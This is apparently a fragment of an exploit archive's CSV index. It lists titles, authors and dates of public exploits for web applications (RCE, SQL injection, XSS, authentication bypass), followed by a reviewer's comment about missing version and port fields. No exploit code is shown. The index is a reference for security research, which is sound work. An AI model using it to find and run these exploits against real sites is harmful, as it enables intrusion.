1570,exploits/php/webapps/1570.pl,"Light Weight Calendar 1.x - 'date' Remote Code Execution",2006-03-09,Hessam-x,webapps,php,
1571,exploits/asp/webapps/1571.html,"JiRos Banner Experience 1.0 - Unauthorised Create Admin",2006-03-09,nukedx,webapps,asp,
1571,exploits/asp/webapps/1571.html,"JiRos Banner Experience 1.0 - Unauthorized Create Admin",2006-03-09,nukedx,webapps,asp,
1575,exploits/php/webapps/1575.pl,"Guestbook Script 1.7 - 'include_files' Remote Code Execution",2006-03-11,rgod,webapps,php,
1576,exploits/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Nomenumbra,webapps,php,
1581,exploits/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution",2006-03-13,rgod,webapps,php,
@ -37989,6 +38005,12 @@ id,file,description,date,author,type,platform,port
43978,exploits/php/webapps/43978.txt,"Joomla! Component JSP Tickets 1.1 - SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,
43980,exploits/php/webapps/43980.txt,"Student Profile Management System Script 2.0.6 - Authentication Bypass",2018-02-05,L0RD,webapps,php,
43981,exploits/hardware/webapps/43981.txt,"Netis WF2419 Router - Cross-Site Scripting",2018-02-05,"Sajibe Kanti",webapps,hardware,
43988,exploits/php/webapps/43988.txt,"Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
43989,exploits/php/webapps/43989.txt,"Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
43990,exploits/php/webapps/43990.txt,"Naukri Clone Script - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
43991,exploits/php/webapps/43991.txt,"Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
43994,exploits/php/webapps/43994.txt,"Online Test Script 2.0.7 - 'cid' SQL Injection",2018-02-07,L0RD,webapps,php,80
43995,exploits/php/webapps/43995.txt,"Entrepreneur Dating Script 2.0.2 - Authentication Bypass",2018-02-07,L0RD,webapps,php,80
41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80
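Review bot: the four Persistent Cross-Site Scripting titles are inconsistent about versions: 43988 carries 1.0.2 but 43989, 43990 and 43991 drop the versions their advisory headers state (=>3.0, 3.0.3, 3.1), so they cannot be matched on version; fill them in. The six new lines set port 80 while 43980 three lines above, a webapp advisory by the same author added two days earlier, has none; apply the same convention to that line.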